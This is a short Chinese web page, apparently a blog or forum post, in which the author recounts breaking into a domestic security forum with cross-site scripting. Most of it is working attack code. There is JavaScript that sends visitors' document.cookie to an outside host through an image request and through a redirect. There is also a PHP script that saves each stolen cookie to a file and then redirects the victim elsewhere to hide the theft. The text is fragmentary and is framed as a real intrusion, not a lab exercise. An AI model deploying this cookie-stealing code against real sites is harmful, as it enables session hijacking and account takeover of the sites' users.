在线时间:8:00-16:00
迪恩网络APP
随时随地掌握行业动态
扫描二维码
关注迪恩网络微信公众号
网上关于XSS入侵网站的例子很多,但是大多都是一些恶作剧性质的介绍.下面本人来亲自介绍下利用脚本入侵国内某安全论坛的过程
论坛——>入侵者布置的跨站攻击——>转移被入侵这视线(隐蔽) var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);
**********************************************************************************************
<script language="JavaScript"> window.location.href="http://www.****.cn/upload_files/reg.php?var"+document.cookie; </script> **********************************************************************************************
************************************************************************************
<?php if (isset($_GET['var'])) { file_put_contents('./cookie/'.time().'.txt', urldecode($_GET['var'])); } ?> <script language="JavaScript"> window.location.href="http://www.ccXv.com"; </script> //转移页面隐蔽上面记录cookie的操作 ************************************************************************************
|
请发表评论